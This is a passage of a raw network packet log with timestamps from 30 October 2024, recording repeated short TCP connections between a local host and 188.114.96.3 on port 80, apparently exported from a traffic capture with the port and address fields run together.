                                                        Oct 30, 2024 05:25:24.999159098 CET5024180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:25.004515886 CET8050242188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:25.004612923 CET5024280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:25.047099113 CET8050241188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:25.047187090 CET5024280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:25.052598000 CET8050242188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:25.164963007 CET5024380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:25.170499086 CET8050243188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:25.173100948 CET5024380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:25.173381090 CET5024380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:25.178662062 CET8050243188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:25.299052000 CET8050241188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:25.301223040 CET5024180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:25.402712107 CET5024280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:25.407987118 CET8050242188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:25.408123016 CET8050242188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:25.527621984 CET5024380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:25.532978058 CET8050243188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:25.590470076 CET8050242188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:25.767386913 CET8050243188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:25.793178082 CET5024280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:25.798762083 CET8050242188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:25.808789015 CET5024380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:25.902554989 CET5024280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:25.954041004 CET8050243188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:25.996967077 CET5024380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:26.078059912 CET5024380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:26.078067064 CET5024280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:26.079246044 CET5024480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:26.083739996 CET8050243188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:26.083797932 CET5024380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:26.084187984 CET8050242188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:26.084239960 CET5024280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:26.084556103 CET8050244188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:26.084619999 CET5024480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:26.084777117 CET5024480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:26.089997053 CET8050244188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:26.434127092 CET5024480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:26.439603090 CET8050244188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:26.688904047 CET8050244188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:26.793207884 CET5024480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:27.010426998 CET8050244188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:27.132975101 CET5024580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:27.138406038 CET8050245188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:27.144927979 CET5024580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:27.145195007 CET5024580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:27.151093960 CET8050245188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:27.199482918 CET5024480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:27.496989965 CET5024580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:27.502492905 CET8050245188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:27.748754978 CET8050245188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:27.793153048 CET5024580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:27.951596022 CET8050245188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:27.996292114 CET5024580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.071432114 CET5024480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.072999001 CET5024580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.073487997 CET5024680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.078607082 CET8050245188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:28.078649998 CET5024580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.078787088 CET8050246188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:28.078845978 CET5024680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.079020977 CET5024680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.084301949 CET8050246188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:28.433826923 CET5024680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.439198971 CET8050246188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:28.678076029 CET8050246188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:28.730755091 CET5024680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.870754004 CET8050246188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:28.918191910 CET5024680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.991945028 CET5024680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.992686033 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.997759104 CET8050246188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:28.997811079 CET5024680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.998619080 CET8050247188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:28.998672962 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:28.998814106 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.004097939 CET8050247188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:29.356995106 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.362464905 CET8050247188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:29.595141888 CET8050247188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:29.797007084 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.804027081 CET8050247188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:29.902574062 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.928981066 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.929399967 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.935689926 CET8050247188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:29.935966015 CET8050248188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:29.937129974 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.937131882 CET5024780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.937206030 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:29.945164919 CET8050248188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.293339014 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.298715115 CET8050248188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.546334982 CET8050248188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.590137959 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.750452995 CET8050248188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.793155909 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.810540915 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.810913086 CET5024980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.816226006 CET8050249188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.816298008 CET5024980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.816349030 CET8050248188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.816402912 CET5024880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.816452026 CET5024980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.821737051 CET8050249188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.867403030 CET5024980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.868161917 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.873450041 CET8050250188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.873506069 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.873586893 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:30.878845930 CET8050250188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:30.914961100 CET8050249188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.240987062 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.246340036 CET8050250188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.318809986 CET8050249188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.322371006 CET5024980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.471132994 CET8050250188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.605813026 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.772936106 CET8050250188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.898718119 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.898721933 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.904196024 CET8050251188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.904566050 CET8050250188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:31.904784918 CET5025080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.904787064 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.904973030 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:31.910517931 CET8050251188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:32.262049913 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:32.267508984 CET8050251188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:32.500691891 CET8050251188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:32.543198109 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:32.709639072 CET8050251188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:32.761910915 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:32.838582993 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:32.843966961 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:32.844027042 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:32.844134092 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:32.849459887 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.201004028 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.206445932 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.434540033 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.605671883 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.635808945 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.635905981 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.636245966 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.772228956 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.772233009 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.777595043 CET8050253188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.777667999 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.777940989 CET8050252188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:33.778141022 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.778171062 CET5025280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:33.783782005 CET8050253188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:34.137103081 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.142509937 CET8050253188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:34.382330894 CET8050253188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:34.433803082 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.577354908 CET8050253188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:34.621299028 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.699146986 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.707581997 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.708420038 CET8050253188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:34.708472013 CET5025380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.712913036 CET8050254188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:34.712965965 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.713089943 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:34.718346119 CET8050254188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.059153080 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.064606905 CET8050254188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.308623075 CET8050254188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.356087923 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.511766911 CET8050254188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.558809042 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.626981974 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.626988888 CET5025180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.627089977 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.632663012 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.632666111 CET5025580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.638341904 CET8050255188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.638427973 CET5025580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.638523102 CET5025580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.638829947 CET8050254188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.638890028 CET5025480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.643812895 CET8050255188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.872055054 CET5025580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.873028040 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.878469944 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.878551960 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.878768921 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.884140968 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.919084072 CET8050255188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.993010044 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.998744011 CET8050257188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:35.998838902 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:35.998976946 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.004255056 CET8050257188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.117966890 CET8050255188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.118031025 CET5025580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.230915070 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.236351013 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.236378908 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.355772972 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.366034985 CET8050257188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.521821022 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.567636967 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.594237089 CET8050257188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.636931896 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.735126972 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.793196917 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.804230928 CET8050257188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.855685949 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.928775072 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.928858995 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.929600954 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.935014963 CET8050256188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.935039043 CET8050258188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.935048103 CET8050257188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:36.935065985 CET5025680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.935144901 CET5025780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.935156107 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.935311079 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:36.940609932 CET8050258188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:37.293282986 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.298645020 CET8050258188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:37.533749104 CET8050258188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:37.575124979 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.742082119 CET8050258188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:37.793276072 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.867285967 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.867332935 CET5025980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.872642040 CET8050259188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:37.873470068 CET8050258188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:37.873591900 CET5025980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.873594999 CET5025880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.873735905 CET5025980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:37.878984928 CET8050259188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:38.230775118 CET5025980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:38.236119986 CET8050259188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:38.471695900 CET8050259188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:38.562531948 CET5025980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:38.674364090 CET8050259188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:38.795253992 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:38.801143885 CET8050260188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:38.801206112 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:38.801332951 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:38.806555033 CET8050260188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:38.811005116 CET5025980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.152896881 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.158360958 CET8050260188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:39.395093918 CET8050260188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:39.449712038 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.598283052 CET8050260188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:39.652578115 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.725441933 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.727067947 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.731143951 CET8050260188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:39.732429028 CET8050261188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:39.735095978 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.735096931 CET5026080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.735196114 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:39.740504026 CET8050261188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:40.090181112 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.095626116 CET8050261188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:40.333498001 CET8050261188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:40.400408983 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.644100904 CET8050261188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:40.757631063 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.758385897 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.763495922 CET8050261188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:40.763556957 CET5026180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.763737917 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:40.763798952 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.763916016 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:40.769140959 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.121545076 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.126909018 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.358155012 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.404648066 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.566579103 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.566608906 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.566771984 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.679142952 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.679919004 CET5026380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.684770107 CET8050262188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.685201883 CET8050263188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.685270071 CET5026280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.685307026 CET5026380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.685427904 CET5026380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.690648079 CET8050263188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.747133017 CET5026380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.747694969 CET5026480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.755325079 CET8050264188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.759114027 CET5026480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.759201050 CET5026480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.765425920 CET8050264188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.799022913 CET8050263188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.866245031 CET5026580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.871624947 CET8050265188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:41.877121925 CET5026580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.877290010 CET5026580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:41.882544041 CET8050265188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:42.106024027 CET5026480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:42.111572027 CET8050264188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:42.111593962 CET8050264188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:42.169236898 CET8050263188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:42.169301033 CET5026380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:42.241904020 CET5026580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:42.247262955 CET8050265188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:42.346199036 CET8050264188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:42.385848999 CET5026480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:42.484997034 CET8050265188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:42.527611971 CET5026580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:42.659590006 CET8050264188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:42.689819098 CET8050265188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:42.730768919 CET5026580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:42.793210983 CET5026480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:42.932993889 CET5026480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:42.938597918 CET8050264188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:42.938661098 CET5026480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:42.942187071 CET5026580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:42.947835922 CET8050265188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:42.947890043 CET5026580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:42.999922037 CET5026680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:43.005254030 CET8050266188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:43.005310059 CET5026680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:43.009016037 CET5026680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:43.014451027 CET8050266188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:43.356161118 CET5026680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:43.361546040 CET8050266188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:43.607988119 CET8050266188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:43.652590990 CET5026680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:43.915004015 CET8050266188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:43.965154886 CET5026680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:44.037885904 CET5026680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:44.038734913 CET5026780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:44.043502092 CET8050266188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:44.044167042 CET8050267188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:44.044265985 CET5026680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:44.044279099 CET5026780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:44.044418097 CET5026780192.168.2.4188.114.96.3
